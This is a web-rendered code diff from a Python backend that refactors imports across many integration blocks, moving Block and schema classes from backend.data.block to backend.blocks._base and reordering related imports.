from backend.blocks._base import (
|
||||||
from backend.data.block import (
|
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
@@ -12,6 +11,7 @@ from backend.data.block import (
|
|||||||
BlockSchemaOutput,
|
BlockSchemaOutput,
|
||||||
BlockType,
|
BlockType,
|
||||||
)
|
)
|
||||||
|
from backend.blocks.helpers.review import HITLReviewHelper
|
||||||
from backend.data.execution import ExecutionContext
|
from backend.data.execution import ExecutionContext
|
||||||
from backend.data.human_review import ReviewResult
|
from backend.data.human_review import ReviewResult
|
||||||
from backend.data.model import SchemaField
|
from backend.data.model import SchemaField
|
||||||
|
|||||||
@@ -3,7 +3,7 @@ from typing import Any, Dict, Literal, Optional
|
|||||||
|
|
||||||
from pydantic import SecretStr
|
from pydantic import SecretStr
|
||||||
|
|
||||||
from backend.data.block import (
|
from backend.blocks._base import (
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
|
|||||||
@@ -2,9 +2,7 @@ import copy
|
|||||||
from datetime import date, time
|
from datetime import date, time
|
||||||
from typing import Any, Optional
|
from typing import Any, Optional
|
||||||
|
|
||||||
# Import for Google Drive file input block
|
from backend.blocks._base import (
|
||||||
from backend.blocks.google._drive import AttachmentView, GoogleDriveFile
|
|
||||||
from backend.data.block import (
|
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
@@ -12,6 +10,9 @@ from backend.data.block import (
|
|||||||
BlockSchemaInput,
|
BlockSchemaInput,
|
||||||
BlockType,
|
BlockType,
|
||||||
)
|
)
|
||||||
|
|
||||||
|
# Import for Google Drive file input block
|
||||||
|
from backend.blocks.google._drive import AttachmentView, GoogleDriveFile
|
||||||
from backend.data.execution import ExecutionContext
|
from backend.data.execution import ExecutionContext
|
||||||
from backend.data.model import SchemaField
|
from backend.data.model import SchemaField
|
||||||
from backend.util.file import store_media_file
|
from backend.util.file import store_media_file
|
||||||
|
|||||||
@@ -1,6 +1,6 @@
|
|||||||
from typing import Any
|
from typing import Any
|
||||||
|
|
||||||
from backend.data.block import (
|
from backend.blocks._base import (
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
|
|||||||
@@ -1,15 +1,15 @@
|
|||||||
from backend.blocks.jina._auth import (
|
from backend.blocks._base import (
|
||||||
JinaCredentials,
|
|
||||||
JinaCredentialsField,
|
|
||||||
JinaCredentialsInput,
|
|
||||||
)
|
|
||||||
from backend.data.block import (
|
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
BlockSchemaInput,
|
BlockSchemaInput,
|
||||||
BlockSchemaOutput,
|
BlockSchemaOutput,
|
||||||
)
|
)
|
||||||
|
from backend.blocks.jina._auth import (
|
||||||
|
JinaCredentials,
|
||||||
|
JinaCredentialsField,
|
||||||
|
JinaCredentialsInput,
|
||||||
|
)
|
||||||
from backend.data.model import SchemaField
|
from backend.data.model import SchemaField
|
||||||
from backend.util.request import Requests
|
from backend.util.request import Requests
|
||||||
|
|
||||||
|
|||||||
@@ -1,15 +1,15 @@
|
|||||||
from backend.blocks.jina._auth import (
|
from backend.blocks._base import (
|
||||||
JinaCredentials,
|
|
||||||
JinaCredentialsField,
|
|
||||||
JinaCredentialsInput,
|
|
||||||
)
|
|
||||||
from backend.data.block import (
|
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
BlockSchemaInput,
|
BlockSchemaInput,
|
||||||
BlockSchemaOutput,
|
BlockSchemaOutput,
|
||||||
)
|
)
|
||||||
|
from backend.blocks.jina._auth import (
|
||||||
|
JinaCredentials,
|
||||||
|
JinaCredentialsField,
|
||||||
|
JinaCredentialsInput,
|
||||||
|
)
|
||||||
from backend.data.model import SchemaField
|
from backend.data.model import SchemaField
|
||||||
from backend.util.request import Requests
|
from backend.util.request import Requests
|
||||||
|
|
||||||
|
|||||||
@@ -3,18 +3,18 @@ from urllib.parse import quote
|
|||||||
|
|
||||||
from typing_extensions import TypedDict
|
from typing_extensions import TypedDict
|
||||||
|
|
||||||
from backend.blocks.jina._auth import (
|
from backend.blocks._base import (
|
||||||
JinaCredentials,
|
|
||||||
JinaCredentialsField,
|
|
||||||
JinaCredentialsInput,
|
|
||||||
)
|
|
||||||
from backend.data.block import (
|
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
BlockSchemaInput,
|
BlockSchemaInput,
|
||||||
BlockSchemaOutput,
|
BlockSchemaOutput,
|
||||||
)
|
)
|
||||||
|
from backend.blocks.jina._auth import (
|
||||||
|
JinaCredentials,
|
||||||
|
JinaCredentialsField,
|
||||||
|
JinaCredentialsInput,
|
||||||
|
)
|
||||||
from backend.data.model import SchemaField
|
from backend.data.model import SchemaField
|
||||||
from backend.util.request import Requests
|
from backend.util.request import Requests
|
||||||
|
|
||||||
|
|||||||
@@ -1,5 +1,12 @@
|
|||||||
from urllib.parse import quote
|
from urllib.parse import quote
|
||||||
|
|
||||||
|
from backend.blocks._base import (
|
||||||
|
Block,
|
||||||
|
BlockCategory,
|
||||||
|
BlockOutput,
|
||||||
|
BlockSchemaInput,
|
||||||
|
BlockSchemaOutput,
|
||||||
|
)
|
||||||
from backend.blocks.jina._auth import (
|
from backend.blocks.jina._auth import (
|
||||||
TEST_CREDENTIALS,
|
TEST_CREDENTIALS,
|
||||||
TEST_CREDENTIALS_INPUT,
|
TEST_CREDENTIALS_INPUT,
|
||||||
@@ -8,13 +15,6 @@ from backend.blocks.jina._auth import (
|
|||||||
JinaCredentialsInput,
|
JinaCredentialsInput,
|
||||||
)
|
)
|
||||||
from backend.blocks.search import GetRequest
|
from backend.blocks.search import GetRequest
|
||||||
from backend.data.block import (
|
|
||||||
Block,
|
|
||||||
BlockCategory,
|
|
||||||
BlockOutput,
|
|
||||||
BlockSchemaInput,
|
|
||||||
BlockSchemaOutput,
|
|
||||||
)
|
|
||||||
from backend.data.model import SchemaField
|
from backend.data.model import SchemaField
|
||||||
from backend.util.exceptions import BlockExecutionError
|
from backend.util.exceptions import BlockExecutionError
|
||||||
|
|
||||||
|
|||||||
@@ -15,7 +15,7 @@ from anthropic.types import ToolParam
|
|||||||
from groq import AsyncGroq
|
from groq import AsyncGroq
|
||||||
from pydantic import BaseModel, SecretStr
|
from pydantic import BaseModel, SecretStr
|
||||||
|
|
||||||
from backend.data.block import (
|
from backend.blocks._base import (
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
|
|||||||
@@ -2,7 +2,7 @@ import operator
|
|||||||
from enum import Enum
|
from enum import Enum
|
||||||
from typing import Any
|
from typing import Any
|
||||||
|
|
||||||
from backend.data.block import (
|
from backend.blocks._base import (
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
|
|||||||
@@ -3,7 +3,7 @@ from typing import List, Literal
|
|||||||
|
|
||||||
from pydantic import SecretStr
|
from pydantic import SecretStr
|
||||||
|
|
||||||
from backend.data.block import (
|
from backend.blocks._base import (
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
|
|||||||
@@ -3,7 +3,7 @@ from typing import Any, Literal, Optional, Union
|
|||||||
from mem0 import MemoryClient
|
from mem0 import MemoryClient
|
||||||
from pydantic import BaseModel, SecretStr
|
from pydantic import BaseModel, SecretStr
|
||||||
|
|
||||||
from backend.data.block import Block, BlockOutput, BlockSchemaInput, BlockSchemaOutput
|
from backend.blocks._base import Block, BlockOutput, BlockSchemaInput, BlockSchemaOutput
|
||||||
from backend.data.model import (
|
from backend.data.model import (
|
||||||
APIKeyCredentials,
|
APIKeyCredentials,
|
||||||
CredentialsField,
|
CredentialsField,
|
||||||
|
|||||||
@@ -4,7 +4,7 @@ from typing import Any, Dict, List, Optional
|
|||||||
|
|
||||||
from pydantic import model_validator
|
from pydantic import model_validator
|
||||||
|
|
||||||
from backend.data.block import (
|
from backend.blocks._base import (
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
|
|||||||
@@ -2,7 +2,7 @@ from __future__ import annotations
|
|||||||
|
|
||||||
from typing import Any, Dict, List, Optional
|
from typing import Any, Dict, List, Optional
|
||||||
|
|
||||||
from backend.data.block import (
|
from backend.blocks._base import (
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
|
|||||||
@@ -1,6 +1,6 @@
|
|||||||
from __future__ import annotations
|
from __future__ import annotations
|
||||||
|
|
||||||
from backend.data.block import (
|
from backend.blocks._base import (
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
|
|||||||
@@ -1,6 +1,6 @@
|
|||||||
from __future__ import annotations
|
from __future__ import annotations
|
||||||
|
|
||||||
from backend.data.block import (
|
from backend.blocks._base import (
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
|
|||||||
@@ -4,7 +4,7 @@ from typing import List, Optional
|
|||||||
|
|
||||||
from pydantic import BaseModel
|
from pydantic import BaseModel
|
||||||
|
|
||||||
from backend.data.block import (
|
from backend.blocks._base import (
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
|
|||||||
@@ -1,15 +1,15 @@
|
|||||||
from backend.blocks.nvidia._auth import (
|
from backend.blocks._base import (
|
||||||
NvidiaCredentials,
|
|
||||||
NvidiaCredentialsField,
|
|
||||||
NvidiaCredentialsInput,
|
|
||||||
)
|
|
||||||
from backend.data.block import (
|
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
BlockSchemaInput,
|
BlockSchemaInput,
|
||||||
BlockSchemaOutput,
|
BlockSchemaOutput,
|
||||||
)
|
)
|
||||||
|
from backend.blocks.nvidia._auth import (
|
||||||
|
NvidiaCredentials,
|
||||||
|
NvidiaCredentialsField,
|
||||||
|
NvidiaCredentialsInput,
|
||||||
|
)
|
||||||
from backend.data.model import SchemaField
|
from backend.data.model import SchemaField
|
||||||
from backend.util.request import Requests
|
from backend.util.request import Requests
|
||||||
from backend.util.type import MediaFileType
|
from backend.util.type import MediaFileType
|
||||||
|
|||||||
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user